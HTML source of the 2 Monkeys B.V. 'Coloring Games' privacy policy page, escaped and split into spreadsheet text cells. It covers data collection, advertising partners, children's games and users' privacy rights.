&lt;head&gt;
&lt;!-- Global site tag (gtag.js) - Google Analytics --&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-41583148-25"&gt;&lt;/script&gt;
&lt;script&gt;
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-41583148-25');
  gtag('consent', 'default', {
  ad_storage: 'denied',
  analytics_storage: 'denied',
  wait_for_update: 500
});
&lt;/script&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
    &lt;meta name="description" content=""&gt;
    &lt;meta name="author" content=""&gt;
    &lt;title&gt;2monkeys - Privacy Policy&lt;/title&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>Bootstrap Core CSS --&gt;
    &lt;link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet"&gt;
    &lt;!-- Custom Fonts --&gt;
    &lt;link href="vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"&gt;
    &lt;link href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'&gt;
    &lt;link href='https://fonts.googleapis.com/css?family=Merriweather:400,300,300italic,400italic,700,700italic,900,900italic' rel='stylesheet' type='text/css'&gt;
    &lt;link href="https://fonts.googleapis.com/ css?family=Roboto+Slab:100,300,400,700&amp;amp;subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel="stylesheet"&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>Plugin CSS --&gt;
    &lt;link href="vendor/magnific-popup/magnific-popup.css" rel="stylesheet"&gt;
    &lt;link href="vendor/iziModal/css/iziModal.css" rel="stylesheet"&gt;
    &lt;!-- Theme CSS --&gt;
    &lt;link href="css/creative.min.css" rel="stylesheet"&gt;
    &lt;link href="css/bootstrap-custom.css" rel="stylesheet"&gt;
    &lt;link rel="stylesheet" href="css/carousel-main.css"&gt;
    &lt;link href="css/custom.css" rel="stylesheet"&gt;
    &lt;link href="css/mathijs.css" rel="stylesheet"&gt;
    &lt;link href="css/willem.css" rel="stylesheet"&gt;
    &lt;!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>WARNING: Respond.js doesn't work if you view the page via file:// --&gt;
    &lt;!--[if lt IE 9]&gt;
        &lt;script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"&gt;&lt;/script&gt;
        &lt;script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"&gt;&lt;/script&gt;
    &lt;! [endif]--&gt;
&lt;style&gt;
li {
    font-size: 17px;
    line-height: 1.5;
    margin-bottom: 20px;
    color: #412000;
        font-weight: 300;
    }
&lt;/style&gt;
&lt;/head&gt;
&lt;body id="page-top"&gt;
    &lt;nav id="mainNav" class="navbar navbar-default navbar-fixed-top"&gt;
        &lt;div class="container-fluid"&gt;
            &lt;!--</t>
  </si>
  <si>
    <t>Brand and toggle get grouped for better mobile display --&gt;
            &lt;div class="navbar-default"&gt;
                &lt;button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1"&gt;
                    &lt;span class="sr-only"&gt;Toggle navigation&lt;/span&gt; Menu &lt;i class="fa fa-bars"&gt;&lt;/i&gt;
                &lt;/button&gt;
                &lt;a class="page-scroll" href="index.php#page-top"&gt;&lt;img class="logoimg" src="img/Logo.png"&gt;&lt;/a&gt;
            &lt;/div&gt;
            &lt;!-- Collect the nav links, forms, and other content for toggling --&gt;
            &lt;div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1"&gt;
                &lt;ul class="nav navbar-nav navbar-right"&gt;
                    &lt;li&gt;
                        &lt;a class="page-scroll" href="index.php#whatwedo"&gt;What do we do&lt;/a&gt;
                    &lt;/li&gt;
                     &lt;li&gt;
                        &lt;a class="page-scroll" href="betas.php"&gt;Open Betas&lt;/a&gt;
                    &lt;/li&gt;
                    &lt;li&gt;
                        &lt;a class="page-scroll" href="index.php#about"&gt;About us&lt;/a&gt;
                    &lt;/li&gt;
                    &lt;li&gt;
                        &lt;a class="page-scroll" href="jobs.php"&gt;Jobs&lt;/a&gt;
                    &lt;/li&gt;
                    &lt;li&gt;
                        &lt;a class="page-scroll" href="index.php#contact"&gt;Contact&lt;/a&gt;
                    &lt;/li&gt;
                &lt;/ul&gt;
            &lt;/div&gt;
            &lt;!--</t>
  </si>
  <si>
    <t>/.navbar-collapse --&gt;
        &lt;/div&gt;
        &lt;!-- /.container-fluid --&gt;
    &lt;/nav&gt;
    &lt;header class="volg"&gt;&lt;/header&gt;
        &lt;div class="container volgcontainer"&gt;
            &lt;div class="volg-content"&gt;
                &lt;a id="volg-cross" href="index.php" class="btnbk btn-bk btn-lg volg-cross page-scroll" role="button" title="Click to return to the main page" data-toggle="tooltip" data-placement="left" style="display: inline;"&gt;
        &lt;span class="glyphicon volg-glyph glyphicon-remove"&gt;&lt;/span&gt;&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
 &lt;br&gt;
&lt;div&gt;
&lt;h2&gt; PRIVACY</t>
  </si>
  <si>
    <t xml:space="preserve">POLICY&lt;/h2&gt;
&lt;br&gt;
 &lt;br&gt;
&lt;p&gt; This privacy policy was last modified on October 25, 2022&lt;/p&gt;
&lt;h3&gt;Overview&lt;/h3&gt;
&lt;h4&gt;About us and how to contact us&lt;/h4&gt;
&lt;p&gt;2 Monkeys B.V. (publishing under the name "Coloring Games") provide free games online and will process your personal information when you play our games.  </t>
  </si>
  <si>
    <t xml:space="preserve">If you have any questions about our data practices, your rights or have any concerns or complaints, you can contact us at &lt;a href="/cdn-cgi/l/email-protection#f0999e969fb0c2dd9d9f9e9b958983de9e9c"&gt;&lt;span class="__cf_email__" data-cfemail="1b72757d745b2936767475707e6268357577"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;, or send a letter to the address provided in the &lt;a href="#adress"&gt; Privacy Policy &lt;/a&gt;. We will respond within 1 month.&lt;/p&gt;
&lt;/br&gt;
&lt;p&gt;
 Our games include but are not limited to:
&lt;br&gt;&lt;br&gt;
 - Cars  (com.color.cars)&lt;/br&gt;
 - Christmas Coloring  (com.coloring.christmas)&lt;/br&gt;
 - Coloring Book: ColorMaster  (com.coloring.book)&lt;/br&gt;
 - Coloring book  (com.coloring.kids)&lt;/br&gt;
 - Coloring for girls and women  (com.coloring.girls)&lt;/br&gt;
 - Dino Coloring Game  (com.coloring.dinosaur)&lt;/br&gt;
 - Dolphins coloring pages  (com.coloring.fishdolphins)&lt;/br&gt;
 - Football coloring book game  (com.coloring.football)&lt;/br&gt;
 - Halloween  (com.coloring.halloween)&lt;/br&gt;
 - Horse coloring pages game  (com.coloring.horse)&lt;/br&gt;
 - Jigsaw Puzzle Game  (com.puzzlemaster.jigsaw)&lt;/br&gt;
 - Mandala Coloring Pages  (com.color.mandala)&lt;/br&gt;
 - Manga Coloring Book  (com.coloring.manga)&lt;/br&gt;
 - Mermaids  (com.coloring.mermaids)&lt;/br&gt;
 - Painting and drawing for Girls  (com.coloring.girlsfree)&lt;/br&gt;
 - Painting and drawing game  (com.coloring.toddlers)&lt;/br&gt;
 - Princess Coloring Game  (com.princess.coloring)&lt;/br&gt;
 - Train game: coloring book.  </t>
  </si>
  <si>
    <t>(com.coloring.trains)&lt;/br&gt;
 - Valentines love coloring book  (com.coloring.love)&lt;/br&gt;
 &lt;/p&gt;
&lt;/br&gt;
&lt;h4&gt;Personal information we collect&lt;/h4&gt;
&lt;p&gt;We collect personal information from you directly, e.g. when you play games or register for an account, and also generate information about your use of our games, including game play and log data.&lt;/p&gt;
&lt;h4&gt;How we use your personal information&lt;/h4&gt;
&lt;p&gt; We use your information to provide you with our games, support and analyse your use, and improve them. We will also use your information to respond to your questions.</t>
  </si>
  <si>
    <t>We sometimes show you ads targeted to you in our games. You can choose to stop receiving these at any time changing your browser or device settings. &lt;a href="#howuse"&gt; More Information &lt;/a&gt; .&lt;/p&gt;
&lt;p&gt;&lt;h4&gt;Who we share your personal information with&lt;/h4&gt;&lt;/p&gt;
&lt;p&gt;We rely on third parties for the purposes set out in the privacy policy, including support services, such as game servers, support ticketing and game analytics.</t>
  </si>
  <si>
    <t>We also work with certain advertising partners to show you ads. Additionally, we share your information within our group and as required by law. &lt;a href="#whoshare"&gt; More Information &lt;/a&gt; .&lt;/p&gt;
&lt;h4&gt;Where we process your personal information&lt;/h4&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>Your Information is processed by us or our service providers in different countries around the world, including Ireland, Portugal, the United Kingdom, the United States of America and other locationsYour rights&lt;/p&gt;
&lt;p&gt;You may have rights to access, receive a copy of, or delete, your information or restrict processing of your data, and you also have the right to object to our use of your information for certain purposes, including tailored marketing and advertising. &lt;a href="#whereshare"&gt; More Information &lt;/a&gt; .&lt;/p&gt;
&lt;h4&gt;Changes to the Privacy Policy&lt;/h4&gt;
&lt;p&gt;Any updates or changes to this Policy will be published here.</t>
  </si>
  <si>
    <t>If there are any significant changes, we will notify you through the website and in-Game.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;a id="adress"&gt;&lt;/a&gt;Introduction&lt;/h3&gt;
&lt;p&gt; This privacy policy ("&lt;strong&gt;Policy&lt;/strong&gt;") informs you of your choices and our practices in relation to your Information (as defined below). In this Policy, ("&lt;strong&gt;2 Monkeys&lt;/strong&gt;"), " &lt;strong&gt;we&lt;/strong&gt;" or "&lt;strong&gt;us&lt;/strong&gt;" refers to 2 Monkeys BV, a companies registered in the Netherlands with its office located at Geert Grootestraat 1, 7411GS', Netherlands.</t>
  </si>
  <si>
    <t>We are the data controller under the applicable privacy laws.&lt;/p&gt;
&lt;p&gt; For the purpose of this Policy, "&lt;strong&gt;Information&lt;/strong&gt;" means any information relating to an identified or identifiable individual. This includes Information relating to your use of: (a) our mobile games ("&lt;strong&gt;Mobile Games&lt;/strong&gt;"); (b) 2-Monkeys.nl and any other dedicated 2 Monkeys websites ("&lt;strong&gt;Website&lt;/strong&gt;").</t>
  </si>
  <si>
    <t>When you use the Mobile Games or the Website (the "&lt;strong&gt;Game&lt;/strong&gt;"), you accept our rules and policies which set out how we handle your Information, and you understand we collect, process, use and store your Information as described in this Policy. &lt;strong&gt; If you do not agree with this Policy, you must not play any of the Games.</t>
  </si>
  <si>
    <t>If you change your mind in the future, you must stop playing the Games and you may exercise your rights in relation to your Information as set out in this Policy.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;a id="whichinfo"&gt;&lt;/a&gt;1. PERSONAL INFORMATION WE COLLECT&lt;/h3&gt;
&lt;p&gt; We will collect and use the following Information about you:&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;p&gt;&lt;i&gt;Information you provide to us&lt;/i&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt;
&lt;li&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Information collected via our customer support channels &lt;/strong&gt; : for example, when you interact with us via Zendesk, our customer support provider, we ask you to provide (a) your full name, email and password, and (b) any information you choose to provide to allow us to assist you.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;p&gt;&lt;i&gt; Information we automatically collect or is generated about you when you play the Games &lt;/i&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt;
&lt;li&gt;&lt;strong&gt;Identifiers&lt;/strong&gt; , such as your IP address, device and app ID, city level location data and device information (such as model, brand and operating system).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cookies&lt;/strong&gt; : we use cookies and other similar technologies (e.g. web beacons, log files, scripts and eTags) ("&lt;strong&gt;Cookies&lt;/strong&gt;") to enhance your experience when using the Games. Cookies are small files which, when placed on your device, enable us to provide certain features and functionality. You have the option to permit installation of such Cookies or subsequently disable them.</t>
  </si>
  <si>
    <t>You may accept all cookies, or instruct the device or web browser to provide notice at the time of installation of cookies, or refuse to accept all cookies by adjusting the relevant cookie retention function in your device. However, in the event of your refusal to install cookies, the Game may be unable to operate as designed. For more information about our Cookies policy , click &lt;a href="/cookiepolicy.php" target="_blank" rel="noopener"&gt; here &lt;/a&gt;</t>
  </si>
  <si>
    <t>.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Information regarding your use of the Games&lt;/strong&gt; , such as date and time stamps of game events, interactions with our teams and ad engagement, and transaction records&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;p&gt;&lt;i&gt;Information received from third parties&lt;/i&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt;
&lt;li&gt;&lt;strong&gt;Information from payment processors&lt;/strong&gt; : when you make payments in our Games, we receive information from our payment processors about your transactions, including your Apple ID number for Apple, your postcode and state for Google&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Analytics information&lt;/strong&gt; : we integrate certain analytics software of Google (Firebase / Analytics), who are based in US, a third party analytics provider in some of our Mobile Games. Google provides reports that help us optimise our in-game features and events to each user of our Mobile Games which include information on your in-game activity.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Information collected from advertising partners&lt;/strong&gt; : we receive information from third party advertising providers (including but not limited to Google, IronSource, Inmobi, Unity and Applovin).This includes information on your aggregate interactions with advertising shown in on our Mobile Games.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;/br&gt;
&lt;p&gt;&lt;em&gt;&lt;i&gt;Children&lt;/i&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;For a Game that is child directed we do not profile our users or provide targeted advertising. A child directed Game only contains contextual advertising.</t>
  </si>
  <si>
    <t>We will only collect data, in these apps when it is needed to provide the service and ensure that they are protected in accordance with the applicable privacy laws. &lt;br /&gt; &lt;br /&gt; If you are a parent or legal guardian of a child under the age of 13 (or under 16 in certain jurisdictions in the European Union) who uses a child directed Game, please contact us at &lt;a href="/cdn-cgi/l/email-protection#97fef9f1f8d7a5badaf8f9fcf2eee4b9f9fb"&gt;&lt;span class="__cf_email__" data-cfemail="d6bfb8b0b996e4fb9bb9b8bdb3afa5f8b8ba"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;, if you have any questions or comments.</t>
  </si>
  <si>
    <t>On your request we will delete your child's personal information if we are able to identify your child, unless you provide us with your verifiable consent for your child to continue to use our Games.&lt;/p&gt;
&lt;p&gt;Except as set forth above, our Games are not targeted at children. Where Children under 16 use our Games, we advise that they obtain the permission of a parent or guardian, and we recommend that parents or guardians clear their browser cache of cookies and take all other steps highlighted in this policy to minimise the data collected.&lt;/p&gt;
&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;
&lt;h3&gt;&lt;a id="howuse"&gt;&lt;/a&gt;2.</t>
  </si>
  <si>
    <t>HOW WE USE YOUR PERSONAL INFORMATION&lt;/h3&gt;
&lt;p&gt; We use your Information to:&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt;
&lt;li&gt;&lt;strong&gt; Provide you with the Games&lt;/strong&gt; .</t>
  </si>
  <si>
    <t>More in particular, we will use your Information to perform our contractual obligation towards you to allow you to play the Games and remember your progress, and to allow you to make purchases via Google Play or the IOS App Store and maintain a record of such purchases. The Information we process when doing so includes information you provide to us when playing the Games, identifiers, information you generate and display when playing the Games, and information regarding your use of the Games such as transaction records.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improve and monitor Game use&lt;/strong&gt; . It is in our legitimate interests to improve our Games for our customers.</t>
  </si>
  <si>
    <t>When doing so, we may collect information we automatically collect or is generated about you when you play the Games, as well as non-personal information about your device such as battery, Wi-Fi strength, device manufacturer, model and operating system, and the amount of free space on your device.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt; Provide you with support and to respond to your requests or complaints &lt;/strong&gt; . If you reach out to us for support, we will use your Information to create a support account for you, respond and resolve your queries and complaints, facilitate support (e.g. assistance with an in-app purchase issue).</t>
  </si>
  <si>
    <t>When doing so, we perform our contractual obligation towards you. The Information we process when doing so includes your identifiers, non-personal information about your device such as your Wi-Fi strength and the amount of free space on your device, and any other information about you collected via our customer support channels.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Conduct analytics&lt;/strong&gt; . It is in our legitimate interests to analyse the use of and inform, our Games and advertising campaigns, and any other interaction or interest in the same.</t>
  </si>
  <si>
    <t>When doing so we will process information we automatically collect or is generated about you when you play the Games or interact with our advertising campaigns to (a) create anonymised and aggregated data; (b) create segments of users who show particular characteristics or interests; and (c) conduct predictive analytics about your interests.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt; Send you updates about in-Game offers and our other products and services that may be of interest to you &lt;/strong&gt; . We will send you promotional offers, and information about other products and services that may be of interest to you.</t>
  </si>
  <si>
    <t>Where it is required, we will only do so where we have your consent. We do so push notification or in Game. When doing so, we process the analytics information above.</t>
  </si>
  <si>
    <t>Your consent can be withdrawn at any time by adjusting your device settings for push notifications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt; Provide you with advertising&lt;/strong&gt; . We will present you with ads and suggestions in our Games and elsewhere.</t>
  </si>
  <si>
    <t>These may be ads relating to our own Games or other services you may be interested in. These ads and suggestions may be tailored specifically to you. Where it is required, we will only do so where we have your consent.</t>
  </si>
  <si>
    <t>In situations where your consent is not required, or where we provide contextual advertising, we do so on the basis of our legitimate interests. If you no longer want to receive targeted advertising you can withdraw your consent in the Games settings, or if that option is not available, please see our &lt;a href="/cookiepolicy.php" target="_blank" rel="noopener"&gt; Cookie Policy &lt;/a&gt; which explains how you can opt out and change your browser and device settings. To tailor ads and to allow our advertising partners to tailor ads, we process information we automatically collect or is generated about you when you play the Games and information received from third parties.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Prevent fraud, defend 2 Monkeys against legal claims or disputes, enforce our terms and to comply with our legal obligations &lt;/strong&gt; . It is in our legitimate interest to protect our interests by (1) monitoring Game use to detect fraud or any other user behaviour which prejudices the integrity of our Games, (2) taking steps to remedy aforementioned fraud and behaviour, (3) defending ourselves against legal claims or disputes, and (4) enforcing our terms and policies. When doing so, we will process the Information relevant in such a case, including information you provide us, information we automatically collect about you, and information which is provided to us by third parties.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;h3&gt;&lt;a id="whoshare"&gt;&lt;/a&gt;3.</t>
  </si>
  <si>
    <t>WHO WE SHARE YOUR PERSONAL INFORMATION WITH&lt;/h3&gt;
&lt;p&gt; We share your Information with selected third parties, including: &lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt;
&lt;li&gt;&lt;strong&gt; Vendors and service providers we rely on for the provision of the Games &lt;/strong&gt; , for example:&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt; &lt;ul&gt;
&lt;li&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Customer support solution providers&lt;/strong&gt; , who help us manage and respond to our customer questions and complaints. This includes Zendesk Inc., who are based in the U.S. and who host our customer support function;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Analytics providers&lt;/strong&gt; : we work with a number of analytics, segmentation and mobile measurement service providers who help us understand our userbase. This includes Google (Firebase and Analytics) who are based in US&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Advertising partners&lt;/strong&gt; .</t>
  </si>
  <si>
    <t>We are an ad-supported service. Subject to your settings, we provide certain Information to advertisers who will use them to serve you with ads in our Games, and we measure who sees and clicks on their ads. We also share advertising identifiers, along with the interests or other characteristics of a device or the person using it, to help partners decide whether to serve an ad to that device or to enable them to conduct marketing, brand analysis, personalise advertising, or similar activities.</t>
  </si>
  <si>
    <t>&lt;a href="#adpartners"&gt; See our list of partners &lt;/a&gt; . For more information on how to limit or opt-out from personalized advertisement, please &lt;a href="/cookiepolicy.php" target="_blank" rel="noopener"&gt; see our Cookie Policy &lt;/a&gt; .&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Payment processors&lt;/strong&gt; : For Mobile Games we use payment processors such as Google (if you run Android on your mobile device) or Apple App Store payments (if you run IOS on your mobile device. These payment processors are responsible for the processing of your Information, and may use your Information for their own purposes in accordance with their privacy policies as below:&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Apple&lt;/strong&gt; : please see the App Store &amp;amp; Privacy policy available on your Apple device&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Google&lt;/strong&gt; : &lt;a href="https://policies.google.com/privacy?mcOpenExternal=true" target="_blank" rel="noopener"&gt; https://policies.google.com/privacy &lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt;
&lt;li&gt;&lt;strong&gt; Law enforcement agencies, public authorities or other judicial bodies and organisations &lt;/strong&gt; .</t>
  </si>
  <si>
    <t>We disclose Information if we are legally required to do so, or if we have a good faith belief that such use is reasonably necessary to comply with a legal obligation, process or request; enforce our terms of service and other agreements, policies, and standards, including investigation of any potential violation thereof; detect, prevent or otherwise address security, fraud or technical issues; or protect the rights, property or safety of us, our users, a third party or the public as required or permitted by law (including exchanging information with other companies and organisations for the purposes of fraud protection).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Change of corporate ownership&lt;/strong&gt; . If we are involved in a merger, acquisition, bankruptcy, reorganisation, partnership, asset sale or other transaction, we may disclose your Information as part of that transaction.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;p&gt;&lt;em&gt;Third Party Privacy Practices&lt;/em&gt;&lt;/p&gt;
&lt;p&gt; If you access any Games through a third-party platform such as Google or Apple ("&lt;strong&gt;Third Party Services&lt;/strong&gt;"), you must understand that those Third Party Services may collect other information about you (including information you share with them directly or about your use of the Games) in accordance with their own terms and privacy policies.</t>
  </si>
  <si>
    <t>The privacy practices described in this Policy do not apply to Third Party Services. Any links in the Games to Third Party Services do not imply that we endorse or have reviewed the Third Party Services.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Security&lt;/em&gt;&lt;/p&gt;
&lt;p&gt; Although we have in place security measures to maintain the privacy and integrity of your Information, unfortunately, the transmission of Information via the internet is not completely secure.</t>
  </si>
  <si>
    <t>We may also take extra steps to protect your Information and minimise the Information we process. For example, when you provide us with your password as part of the registration process, we apply a one-way hash.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;a id="whereshare"&gt;&lt;/a&gt;4. WHERE WE PROCESS YOUR PERSONAL INFORMATION&lt;/h3&gt;
&lt;p&gt;We process your Information in several countries, including countries within the European Economic Area ("EEA"), the United Kingdom ("UK"), the United States of America and others.</t>
  </si>
  <si>
    <t>&lt;br /&gt; When we transfer your Information outside the UK or the EEA, we may transfer it to countries that have been recognised as offering an adequate protection by the EEA or the UK. When this adequacy status has not been offered, we use standard contracts that can be used in the EEA or the UK to safeguard your Information while transferring it outside the EEA or the UK.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;5. HOW LONG WE STORE YOUR INFORMATION&lt;/h3&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>Your Information is kept for as long as you are using our games, and then for up to three years from the date you stop interacting with the games.&lt;/p&gt;
&lt;p&gt;When deleting Information, we will take measures to make the Information irrecoverable or irreproducible, and electronic files which contain Information will be deleted permanently.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;6. YOUR RIGHTS&lt;/h3&gt;
&lt;p&gt;If you are based in the EEA, Switzerland or are a legal resident of California in the U.S., you have certain rights in relation to your Information. For Californian residents, please &lt;a href="#cppa"&gt; refer to Addendum 1 - California Privacy Rights &lt;/a&gt; .</t>
  </si>
  <si>
    <t>For Brazilian residents, please &lt;a href="#brazil"&gt; refer to Addendum 2 - Brazil Privacy Rights &lt;/a&gt; . For EEA and Switzerland based, you will find more information below on when which rights can apply.&lt;/p&gt;
&lt;p&gt;To exercise your rights, please email us at &lt;u&gt; &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="1b72757d745b2936567475707e6268357577"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/u&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt;
&lt;li&gt;&lt;strong&gt;Access&lt;/strong&gt; . You have the right to access Information, and to receive an explanation of how we use it and who we share it with.</t>
  </si>
  <si>
    <t>This right is not absolute. For example, we cannot reveal trade secrets, or give you Information about other individuals.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Erasure&lt;/strong&gt; . You have the right to request deletion of your Information.</t>
  </si>
  <si>
    <t>We may need to retain some of your Information where there are valid grounds for us to do so under data protection laws. For example, for the defence of legal claims, respect freedom of expression, or where we have an overriding legitimate interest to do so, but we will let you know when this is the case. Note that where the Information is held by a third party data controller, such as an advertising partner or a payment processor, we will use reasonable steps to inform them of your request, but we recommend you contact them directly in accordance with their own privacy policies to ensure your personal data is erased.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Objection and withdrawal of consent&lt;/strong&gt; : You have the right to (i) withdraw your consent where you previously provided such consent; or (ii) object to our processing of your Information where we process such Information on the basis of our legitimate interests (see above under &lt;a href="#howuse"&gt;</t>
  </si>
  <si>
    <t>How we use your personal information &lt;/a&gt; ). You may exercise this right as follows:&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt;
&lt;li&gt;&lt;strong&gt;To stop receiving personalized advertising&lt;/strong&gt; : for Mobile Games, please withdraw your consent in the in-app Settings. You can also find more information in our &lt;a href="/cookiepolicy.php" target="_blank" rel="noopener"&gt; Cookie Policy &lt;/a&gt;</t>
  </si>
  <si>
    <t>.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt; To stop our cookies being placed&lt;/strong&gt; : please refer to our &lt;a href="/cookiepolicy.php" target="_blank" rel="noopener"&gt; Cookie Policy &lt;/a&gt; .&lt;/li&gt;
&lt;li&gt;&lt;strong&gt; To stop receiving push notifications&lt;/strong&gt; : please change your device or browser settings.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt;
&lt;li&gt;&lt;strong&gt;Portability&lt;/strong&gt; .</t>
  </si>
  <si>
    <t>You have the right to receive a copy of Information we process on the basis of consent or contract in a structured, commonly used and machine-readable format, or to request that such Information is transferred to a third party.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Correction&lt;/strong&gt; . You have the right to correct any Information held about you that is inaccurate.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Restriction&lt;/strong&gt; . You have a right in certain circumstances to stop us processing Information other than for storage purposes.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;h3&gt;7.</t>
  </si>
  <si>
    <t>CONTACT &amp;amp; COMPLAINTS&lt;/h3&gt;
&lt;p&gt;We welcome questions, comments and requests regarding this Policy. These should be addressed to &lt;a href="/cdn-cgi/l/email-protection#96fff8f0f9d6a4bbdbf9f8fdf3efe5b8f8fa"&gt;&lt;span class="__cf_email__" data-cfemail="7c15121a133c4e513113121719050f521210"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;. You can also send a letter to 2 Monkeys Data Protection c/o Miniclip SA, Faubourg de l'H&amp;ocirc;pital 18, 2000 Neuch&amp;acirc;tel, Switzerland.</t>
  </si>
  <si>
    <t>Alternatively, if you are based in the EEA, you can send a letter to 2Monkeys Data protection c/o Miniclip (UK) Limited at Legal Department at Miniclip, Holborn Gate, 326-330 High Holborn, London WC1V 7PP.&lt;/p&gt;
&lt;p&gt;If you wish to make a complaint about how we process your Information, please contact us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="eb82858d84abd9c6a68485808e9298c58587"&gt;[email&amp;#160;protected]&lt;/a&gt; and we will endeavour to deal with your complaint as soon as possible. This is without prejudice to your right to launch a claim with a data protection authority.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;8. CHANGES&lt;/h3&gt;
&lt;p&gt;Any updates or changes to this Policy will be published here.</t>
  </si>
  <si>
    <t>If there are any significant changes, we will notify you through the website and in-Game.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;a id="adpartners"&gt;&lt;/a&gt;
&lt;h3&gt;ADVERTISING AND USER ACQUISITION PARTNERS&lt;/h3&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;p&gt; We use the following advertising partners, that are integrated into some or all the Games. Please check the following privacy policies to learn more about their privacy practices, including how you may exercise your data subject rights.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>This list was last updated on 29 September 2022&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
